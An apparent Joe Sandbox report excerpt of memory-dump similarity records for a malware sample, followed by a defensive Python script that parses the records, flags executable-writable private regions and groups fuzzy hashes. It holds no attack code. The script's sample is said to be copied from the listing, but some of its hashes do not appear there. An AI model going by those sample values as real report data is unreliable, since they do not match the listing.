                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 6dcd04fd9b9df92972df9b7faa7638abaed969b5c1e15ae4aec0246757457e41
                                                                                                                                                                            • Instruction ID: a2c9092d08fbb4d4476b884b1980ec2c1fa64faf4cf6e84c7c9118ea5098bea2
                                                                                                                                                                            • Opcode Fuzzy Hash: 6dcd04fd9b9df92972df9b7faa7638abaed969b5c1e15ae4aec0246757457e41
                                                                                                                                                                            • Instruction Fuzzy Hash: 21D19F74E00318CFDB55DFA5C984B9DBBB2BF89300F2081A9D408AB2A5DB359E81DF50
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3350992406.0000000022810000.00000040.00000800.00020000.00000000.sdmp, Offset: 22810000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_22810000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: c3d11b0391ab972c3bde9e7beda20b13a505a3016cf6fccb52019f93c1f592ef
                                                                                                                                                                            • Instruction ID: ed9bb93a18290829164dea824221c22882f13bf4258fdb17fcd4363174f9ac1b
                                                                                                                                                                            • Opcode Fuzzy Hash: c3d11b0391ab972c3bde9e7beda20b13a505a3016cf6fccb52019f93c1f592ef
                                                                                                                                                                            • Instruction Fuzzy Hash: 81D18E74E00318CFDB15DFA5C984B9DBBB2BF89300F2081A9D508AB2A5DB359A81DF51
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3350992406.0000000022810000.00000040.00000800.00020000.00000000.sdmp, Offset: 22810000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_22810000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 0c93bddacc4e6ddb24a093f5ca504ce803459a067c0a98982a5bd0bf86f1f8c4
                                                                                                                                                                            • Instruction ID: c69be3c7b4c863c62b901db7e4b86d0be501a5ad867aa6bb3821dbdb4f45f684
                                                                                                                                                                            • Opcode Fuzzy Hash: 0c93bddacc4e6ddb24a093f5ca504ce803459a067c0a98982a5bd0bf86f1f8c4
                                                                                                                                                                            • Instruction Fuzzy Hash: BCD18F78E04318CFDB15DFA5C994B9DBBB2BF89300F2081A9D408A72A5DB349E81DF50
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3350992406.0000000022810000.00000040.00000800.00020000.00000000.sdmp, Offset: 22810000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_22810000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 3a939db551d6aeccd01f23f48835b5ecdd48bd9751838c5cd636aeb18e0cf79d
                                                                                                                                                                            • Instruction ID: e05482e76c96aa6427cc2fd1148201d1f15e9665e1ba2d2926622b4e17bb3d60
                                                                                                                                                                            • Opcode Fuzzy Hash: 3a939db551d6aeccd01f23f48835b5ecdd48bd9751838c5cd636aeb18e0cf79d
                                                                                                                                                                            • Instruction Fuzzy Hash: 93D19F74E01318CFDB55DFA5C985B9DBBB2BF89300F6081A9D408AB2A5DB349E81DF50
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3350992406.0000000022810000.00000040.00000800.00020000.00000000.sdmp, Offset: 22810000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_22810000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: e5b74f91d6e0685d762ad4b8c1a680b9f697bb13fc83dd1ae847a0f893d2d293
                                                                                                                                                                            • Instruction ID: 78efbd9d8acd434446d00468941300b55ab575584f7220e05955d3d92b30006f
                                                                                                                                                                            • Opcode Fuzzy Hash: e5b74f91d6e0685d762ad4b8c1a680b9f697bb13fc83dd1ae847a0f893d2d293
• Instruction Fuzzy Hash: 75D18074E00318CFDB15DFA5C994B9DBBB2BF89300F2081A9D408AB2A5DB359E81DF50
Memory Dump Source
• Source File: 00000006.00000002.3350992406.0000000022810000.00000040.00000800.00020000.00000000.sdmp, Offset: 22810000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_22810000_Mangedoblende.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: b5d477d1d78c49ad304be028f8c6f2ec65d2f7935dd52cc1d5ae81187d5c9c33
• Instruction ID: 180980db75f1ebf5b7bb9b51e1e701620f623e608f8da5a88f58972bc670c389
• Opcode Fuzzy Hash: b5d477d1d78c49ad304be028f8c6f2ec65d2f7935dd52cc1d5ae81187d5c9c33
• Instruction Fuzzy Hash: 55D19F74E04318CFDB55DFA5C984B9DBBB2BF89300F2081A9D408A72A5DB359E81DF50
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3350992406.0000000022810000.00000040.00000800.00020000.00000000.sdmp, Offset: 22810000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_22810000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: df8ba24d662d66ba25cede575f6d58d0e2a052ed789296ae8f96a76abfef65d9
                                                                                                                                                                            • Instruction ID: b7fbf7bc0f910ad379167a9f792a730b4ef695de118e041b602c913f9125c2c9
                                                                                                                                                                            • Opcode Fuzzy Hash: df8ba24d662d66ba25cede575f6d58d0e2a052ed789296ae8f96a76abfef65d9
                                                                                                                                                                            • Instruction Fuzzy Hash: 4DD1AE78E00318CFDB55DFA5C994B9DBBB2AF89300F5081A9D808AB369DB349D81CF11
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3350992406.0000000022810000.00000040.00000800.00020000.00000000.sdmp, Offset: 22810000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_22810000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 6e7e53aa3d5272c0a0b6bdc2f1642742b5d950e13379afe312ab28b84772bcf7
                                                                                                                                                                            • Instruction ID: dc18073cbee3bda53902e1901a150e7e9b8059a26aa7e088f582a90d55f8a10f
                                                                                                                                                                            • Opcode Fuzzy Hash: 6e7e53aa3d5272c0a0b6bdc2f1642742b5d950e13379afe312ab28b84772bcf7
                                                                                                                                                                            • Instruction Fuzzy Hash: EDD1AEB8E00318CFDB15DFA5C994B9DBBB2AF89300F5081A9D908AB365DB359D81CF50
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3350992406.0000000022810000.00000040.00000800.00020000.00000000.sdmp, Offset: 22810000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_22810000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 857e06bbdf0785779649eaca61c0a3a63875f66b3e00fc67f592c81d00d24b36
                                                                                                                                                                            • Instruction ID: 2541fd87e823543681167b7adea98f8597a26dc09fd1cfa2598a4123e0c6510f
                                                                                                                                                                            • Opcode Fuzzy Hash: 857e06bbdf0785779649eaca61c0a3a63875f66b3e00fc67f592c81d00d24b36
                                                                                                                                                                            • Instruction Fuzzy Hash: 39D1AF78E00318CFDB15DFA5C994B9DBBB2AF89300F5081A9D808AB365DB359E81CF50
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3350992406.0000000022810000.00000040.00000800.00020000.00000000.sdmp, Offset: 22810000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_22810000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: ea3973c936669bc673c65d737a5584d5c456b4306f1a409de5adc5414b63fee3
                                                                                                                                                                            • Instruction ID: 2e5427a82315f6c4773b8bf27d47b02471bdc5ec8d9f2fe907141451aab6e977
                                                                                                                                                                            • Opcode Fuzzy Hash: ea3973c936669bc673c65d737a5584d5c456b4306f1a409de5adc5414b63fee3
                                                                                                                                                                            • Instruction Fuzzy Hash: 61D19E78E00618CFDB15DFA5C994B9DBBB2AF89300F5081A9D908AB365DB359981CF11
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3350992406.0000000022810000.00000040.00000800.00020000.00000000.sdmp, Offset: 22810000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_22810000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 219fa02d007c71466cc0bd781c9f65a63a06c3b04713f2c7778fe3621cfd076c
                                                                                                                                                                            • Instruction ID: 72ed71bc7181be5bda0d270140da0c29c0a2c13c764e666c11a254786cd30f1b
                                                                                                                                                                            • Opcode Fuzzy Hash: 219fa02d007c71466cc0bd781c9f65a63a06c3b04713f2c7778fe3621cfd076c
                                                                                                                                                                            • Instruction Fuzzy Hash: FAC1A178E05718CFDB14DFA5C984B9DBBB2AF89304F1081A9D408AB3A5DB359E81CF50
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3333182721.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00180000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_180000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 6fc822f9173a75f23e84302a7eba6051a372e798b3f71515e0062a3f5c7214a7
                                                                                                                                                                            • Instruction ID: f936af234c2f56b0b7006aa2b56885bc687979016b9af092136fdfeaa5b58bad
                                                                                                                                                                            • Opcode Fuzzy Hash: 6fc822f9173a75f23e84302a7eba6051a372e798b3f71515e0062a3f5c7214a7
                                                                                                                                                                            • Instruction Fuzzy Hash: BBC1AF74E04218CFDB14DFA5C994B9DBBB2BF89305F2081A9D809AB365DB359E81CF50
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3333182721.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00180000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_180000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: f1dd574a1cf45a463ff76700b01ba7e45d6d51b612efbbb1f1a534aaaaeecddd
                                                                                                                                                                            • Instruction ID: c3cf80777cd75a9d01499b56be96fc16e7da837a8d8a642032f285f05ac374e0
                                                                                                                                                                            • Opcode Fuzzy Hash: f1dd574a1cf45a463ff76700b01ba7e45d6d51b612efbbb1f1a534aaaaeecddd
                                                                                                                                                                            • Instruction Fuzzy Hash: BE511970D05208DBDB08EFA9D5847AEBBB2BF89300F24D129E4047B294DB759A86CF54
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3333182721.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00180000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_180000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 706f2746db9994895c93abc0fa93f32587b77030c1b83fdfbdef5a9dbdb88c9e
                                                                                                                                                                            • Instruction ID: 4cadb340f95701a706b6b7e9dfeed2d27528e0c098220897d051c56e57862cb9
                                                                                                                                                                            • Opcode Fuzzy Hash: 706f2746db9994895c93abc0fa93f32587b77030c1b83fdfbdef5a9dbdb88c9e
                                                                                                                                                                            • Instruction Fuzzy Hash: B051F670D05208CFDB04EFA8D594BAEBBB2FF49314F209169E405BB295D7399A82CF54
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3333182721.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00180000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_180000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: F$F$F$F
                                                                                                                                                                            • API String ID: 0-1844600021
                                                                                                                                                                            • Opcode ID: abc79c0819bd9d5f7d9ea85e36427b508f9db9433b405e082a0c4277ac512795
                                                                                                                                                                            • Instruction ID: b38a3dfce2a875c79b3ed9ddb2e2f81b1ab501707027838a886f84d8eab581a4
                                                                                                                                                                            • Opcode Fuzzy Hash: abc79c0819bd9d5f7d9ea85e36427b508f9db9433b405e082a0c4277ac512795
                                                                                                                                                                            • Instruction Fuzzy Hash: ED41D574E00249AFCB09EFB8C4416AE7BB6FF8A300F104968E4009B356DB345E46DF91
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3333182721.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00180000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_180000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: T$F$F$F
                                                                                                                                                                            • API String ID: 0-3026544444
                                                                                                                                                                            • Opcode ID: a5dd696867f49714701deacedbcc84904116366fe034636d7378a188af3252e1
                                                                                                                                                                            • Instruction ID: 2b2678d74309dc0149bc0547dac56495254ed5dec91f4bbfc69501646136e0f3
                                                                                                                                                                            • Opcode Fuzzy Hash: a5dd696867f49714701deacedbcc84904116366fe034636d7378a188af3252e1
                                                                                                                                                                            • Instruction Fuzzy Hash: AA216F74E002089BDB05EFB9C4417AEB7B6FF8A304F1084A9A4149B355EB785A45DF81
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3333182721.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00180000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_180000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: \;eq$\;eq$\;eq$\;eq
                                                                                                                                                                            • API String ID: 0-3455962030
                                                                                                                                                                            • Opcode ID: 64f6756345535540945b97f097a9343817c926430fa7fbfe06f0d5ebbd19772f
                                                                                                                                                                            • Instruction ID: 7ac6368546ee836cbfa101641f64da39d4a56857621ea5e23261c2f172d377c1
                                                                                                                                                                            • Opcode Fuzzy Hash: 64f6756345535540945b97f097a9343817c926430fa7fbfe06f0d5ebbd19772f
                                                                                                                                                                            • Instruction Fuzzy Hash: 7001AD31B101158FCB68AE2DC584E2677E6BF98B68726416AE405CB3F5EB31ED41CF90
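The records above are easier to triage once they are parsed rather than read one by one. The following is an added example (not Joe Sandbox code, and not part of the original report) that parses "Memory Dump Source" / "Similarity" records in exactly the text form shown above, decodes the memory-region descriptor embedded in the .sdmp file name, flags dumps that are executable, writable, private and not backed by a PE (the shape unpacked or injected code takes), and groups near-identical "Instruction Fuzzy Hash" values per region. Two assumptions are stated in the code: the .sdmp name layout (process index, dump pass, base address, then a page-protection field and a memory-type field) is inferred from the values on this page and the standard Win32 constants (0x40 = PAGE_EXECUTE_READWRITE, 0x20000 = MEM_PRIVATE), not from Joe Sandbox documentation; and the position-wise similarity used for grouping is a simple heuristic on the fixed-length hash string, not Joe Sandbox's own similarity metric. The sample records are constructed from the listing above.

```python
"""Parse Joe Sandbox memory-dump similarity records and triage them.

Added example; not Joe Sandbox code. Field meanings below are assumptions
inferred from the report values plus documented Win32 constants.
"""
import re
from collections import defaultdict

# Documented Win32 memory constants (certain).
PAGE_PROTECT = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}
EXEC_MASK = 0x10 | 0x20 | 0x40 | 0x80      # any execute protection
WRITE_MASK = 0x04 | 0x08 | 0x40 | 0x80     # any write / write-copy protection

# ASSUMPTION: name layout is <proc>.<pass>.<ts>.<base>.<protect>.<unknown>.<type>.<unknown>.sdmp
SDMP_RE = re.compile(
    r"^([0-9A-Fa-f]{8})\.([0-9A-Fa-f]{8})\.(\d+)\.([0-9A-Fa-f]{16})"
    r"\.([0-9A-Fa-f]{8})\.([0-9A-Fa-f]{8})\.([0-9A-Fa-f]{8})\.([0-9A-Fa-f]{8})\.sdmp$"
)


def decode_sdmp_name(name):
    """Decode the region descriptor in a .sdmp file name into a dict."""
    m = SDMP_RE.match(name)
    if not m:
        raise ValueError("not a recognised .sdmp name: %s" % name)
    proc, dump_pass, _ts, base, protect, _state, mtype, _tail = m.groups()
    protect_v, type_v = int(protect, 16), int(mtype, 16)
    return {
        "process_index": int(proc, 16),
        "dump_pass": int(dump_pass, 16),
        "base": int(base, 16),
        "protect": PAGE_PROTECT.get(protect_v, hex(protect_v)),
        "type": MEM_TYPE.get(type_v, hex(type_v)),
        "executable": bool(protect_v & EXEC_MASK),
        "writable": bool(protect_v & WRITE_MASK),
    }


def parse_records(text):
    """Split the report text into one dict per 'Memory Dump Source' record."""
    records, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "Memory Dump Source":
            current = {}
            records.append(current)
            continue
        if current is None or not line.startswith("•"):
            continue                      # 'Strings', 'Similarity', plugin name lines
        key, _, value = line[1:].partition(":")
        key, value = key.strip(), value.strip()
        if key == "Source File":
            parts = [p.strip() for p in value.split(",")]
            current["sdmp"] = decode_sdmp_name(parts[0])
            for part in parts[1:]:
                k, _, v = part.partition(":")
                if k.strip() == "Offset":
                    current["offset"] = int(v.strip(), 16)
                elif k.strip() == "based on PE":
                    current["based_on_pe"] = v.strip().lower() == "true"
        else:
            current[key] = value
    return records


def flag_rwx_nonpe(records):
    """Base addresses of dumps that are RWX, private and not a PE image."""
    hits = set()
    for r in records:
        d = r["sdmp"]
        if d["executable"] and d["writable"] and d["type"] == "MEM_PRIVATE" \
                and not r.get("based_on_pe", True):
            hits.add(d["base"])
    return sorted(hits)


def hamming(a, b):
    """Number of differing positions between two equal-length hash strings."""
    if len(a) != len(b):
        raise ValueError("hash length mismatch")
    return sum(x != y for x, y in zip(a, b))


def similarity(a, b):
    # ASSUMPTION: position-wise agreement is used as a cheap similarity heuristic.
    return 1.0 - hamming(a, b) / len(a)


def cluster_by_region(records, threshold=0.8):
    """Greedy grouping of Instruction Fuzzy Hash values, per dump base address."""
    clusters = defaultdict(list)
    for r in records:
        h = r.get("Instruction Fuzzy Hash")
        if not h:
            continue
        base = r["sdmp"]["base"]
        for group in clusters[base]:
            if similarity(group[0], h) >= threshold:
                group.append(h)
                break
        else:
            clusters[base].append([h])
    return dict(clusters)


# Constructed sample: five records copied from the listing above.
SAMPLE = """
Memory Dump Source
• Source File: 00000006.00000002.3350992406.0000000022810000.00000040.00000800.00020000.00000000.sdmp, Offset: 22810000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_22810000_Mangedoblende.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 25ab498f96941be86b1ae7600be7e07c392c09158bffaaae3b2f3d4cfceb17f5
• Instruction Fuzzy Hash: 2CD1AFB8E00318CFDB55DFA5C994B9DBBB2AF89300F5081A9D908AB365DB359D81CF50
Memory Dump Source
• Source File: 00000006.00000002.3350992406.0000000022810000.00000040.00000800.00020000.00000000.sdmp, Offset: 22810000, based on PE: false
• Instruction Fuzzy Hash: ABD1AF78E00318CFDB15DFA5C984B9DBBB2AF89300F5081A9D908AB369DB349D81CF11
Memory Dump Source
• Source File: 00000006.00000002.3350992406.0000000022810000.00000040.00000800.00020000.00000000.sdmp, Offset: 22810000, based on PE: false
• Instruction Fuzzy Hash: 4DD1AE78E00318CFDB55DFA5C994B9DBBB2AF89300F5081A9D808AB369DB349D81CF11
Memory Dump Source
• Source File: 00000006.00000002.3333182721.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00180000, based on PE: false
• Instruction Fuzzy Hash: BE511970D05208DBDB08EFA9D5847AEBBB2BF89300F24D129E4047B294DB759A86CF54
Strings
Memory Dump Source
• Source File: 00000006.00000002.3333182721.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00180000, based on PE: false
Similarity
• String ID: F$F$F$F
• API String ID: 0-1844600021
• Instruction Fuzzy Hash: ED41D574E00249AFCB09EFB8C4416AE7BB6FF8A300F104968E4009B356DB345E46DF91
"""

if __name__ == "__main__":
    recs = parse_records(SAMPLE)
    print("RWX non-PE private regions:", [hex(b) for b in flag_rwx_nonpe(recs)])
    for base, groups in cluster_by_region(recs).items():
        print(hex(base), [len(g) for g in groups], "group sizes")
```

Run stand-alone it reports both dump regions (0x180000 and 0x22810000) as RWX private non-PE memory and shows that the three 0x22810000 hashes fall into one group while the two 0x180000 hashes stay apart; the grouping threshold is deliberately coarse and should be tuned against known-good pairs before being used for anything beyond first-pass triage.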